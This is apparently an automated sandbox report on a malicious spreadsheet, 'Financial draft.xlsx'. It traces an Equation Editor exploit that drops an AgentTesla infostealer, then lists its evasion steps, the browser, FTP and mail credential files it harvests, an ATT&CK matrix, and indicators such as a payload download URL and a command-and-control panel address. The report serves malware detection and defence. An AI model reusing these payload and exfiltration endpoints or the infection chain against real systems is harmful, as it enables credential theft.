                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: Financial draft.xlsxStream path 'EncryptedPackage' entropy: 7.99990883648 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 894
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2340Thread sleep time: -360000s >= -30000s
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2340Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exe TID: 2836Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2996Thread sleep time: -300000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2972Thread sleep count: 894 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -49080s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -46896s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -44088s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -42996s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -37286s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -36194s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -33386s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -32294s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3052Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
                Source: C:\Users\Public\vbc.exeCode function: 4_2_006301CB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 4_2_006300AD mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 4_2_006300AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Maps a DLL or memory area into another processShow sources
                Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                Modifies the hosts fileShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Writes to foreign memory regionsShow sources
                Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: RegAsm.exe, 00000005.00000002.2390847566.0000000000E50000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: RegAsm.exe, 00000005.00000002.2390847566.0000000000E50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: RegAsm.exe, 00000005.00000002.2390847566.0000000000E50000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings:

                barindex
                Modifies the hosts fileShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391676087.00000000029CC000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2190995416.00000000008E2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2194644538.0000000003F00000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391709320.0000000002A02000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2880, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2912, type: MEMORY
                Source: Yara matchFile source: 4.2.vbc.exe.8e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: Yara matchFile source: 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391709320.0000000002A02000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2880, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391676087.00000000029CC000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2190995416.00000000008E2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2194644538.0000000003F00000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2391709320.0000000002A02000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2880, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2912, type: MEMORY
                Source: Yara matchFile source: 4.2.vbc.exe.8e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection212File and Directory Permissions Modification1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information21NTDSVirtualization/Sandbox Evasion13Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion13DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 321109 Sample: Financial draft.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 31 Antivirus detection for URL or domain 2->31 33 Antivirus detection for dropped file 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 12 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 14 2->12         started        process3 dnsIp4 29 192.210.214.146, 49167, 49168, 49169 AS-COLOCROSSINGUS United States 7->29 23 C:\Users\user\AppData\Local\...\new[1].exe, PE32 7->23 dropped 25 C:\Users\Public\vbc.exe, PE32 7->25 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        27 C:\Users\user\...\~$Financial draft.xlsx, data 12->27 dropped file5 signatures6 process7 signatures8 49 Antivirus detection for dropped file 14->49 51 Multi AV Scanner detection for dropped file 14->51 53 Machine Learning detection for dropped file 14->53 55 2 other signatures 14->55 17 RegAsm.exe 12 10 14->17         started        process9 file10 21 C:\Windows\System32\drivers\etc\hosts, ASCII 17->21 dropped 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->41 43 Tries to steal Mail credentials (via file access) 17->43 45 4 other signatures 17->45 signatures11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Financial draft.xlsx21%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\Public\vbc.exe100%AviraTR/Kryptik.mnddi
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe100%AviraTR/Kryptik.mnddi
                C:\Users\Public\vbc.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe35%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                C:\Users\Public\vbc.exe35%MetadefenderBrowse
                C:\Users\Public\vbc.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                4.2.vbc.exe.8e0000.1.unpack100%AviraHEUR/AGEN.1138205Download File
                5.2.RegAsm.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                http://192.210.214.146P0%Avira URL Cloudsafe
                http://192.210.214.1460%Avira URL Cloudsafe
                http://o0VOknSTi6os4KGPlT.net0%Avira URL Cloudsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://ns.a0%Avira URL Cloudsafe
                http://192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php127.0.0.1POST0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                http://cNhFXD.com0%Avira URL Cloudsafe
                http://192.210.214.146/new.exe100%Avira URL Cloudmalware
                http://192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php0%Avira URL Cloudsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://192.210.214.146/new.exetrue
                • Avira URL Cloud: malware
                unknown
                http://192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.phptrue
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://management.azure.com/Chttps://login.microsoftonline.comvbc.exe.2.drfalse
                  high
                  http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://DynDns.comDynDNSRegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegAsm.exe, 00000005.00000002.2391007189.0000000002410000.00000002.00000001.sdmpfalse
                    high
                    https://login.microsoftonline.comvbc.exefalse
                      high
                      https://management.azure.com/subscriptions/vbc.exe.2.drfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot%telegramapi%/vbc.exe, 00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmpfalse
                          high
                          http://192.210.214.146PRegAsm.exe, 00000005.00000002.2391633651.00000000029A0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          https://management.azure.com/vbc.exefalse
                            high
